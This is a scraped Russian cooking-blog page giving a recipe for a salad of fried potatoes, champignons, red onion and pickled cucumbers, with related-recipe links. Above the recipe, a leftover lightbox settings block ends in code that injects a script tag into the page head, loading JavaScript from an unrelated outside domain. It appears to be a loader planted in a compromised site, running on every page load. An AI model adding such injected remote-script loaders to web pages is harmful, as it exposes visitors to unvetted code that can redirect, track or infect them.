, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салатик по-русски


salatikКартошка с грибами — это классика. А мы это блюдо сделаем еще более классическим, добавив соленых огурчиков… и водочки по желанию.

Что и сколько берем:

1. Картошка — 2-3 шт

2. Шампиньоны — 300 гр

3. Лук красный — 1 шт

4. Огурцы маринованные — 6-7 шт

Начинаем готовить:

Картошку режем кубиками и обжариваем на сильном огне до готовности. Затем поливаем небольшим количеством огуречного маринада  и оставляем ждать остальных ингредиентов. Тем временем, обжариваем на сильном огне лук минуты 3-4, чтобы он остался жестким. Шампиньоны режем пластиночками и тоже активно и мало жарим на сильном огне, быстро помешивая, буквально пару минут (иначе начнут пускать сок). Когда все составляющие готовы, смело все выкладываем в глубокую чашку и  размешиваем, не забывая добавить огурчики. Солить и перчить всегда по вкусу. Вместо шампиньонов можно брать  опята или лисички (если сезон).

На эту тему вы можете почитать:

Шахи-панир
Баклажаны с острым соусом
Теплый салат из овощей

Тэги: ,



Добавить комментарий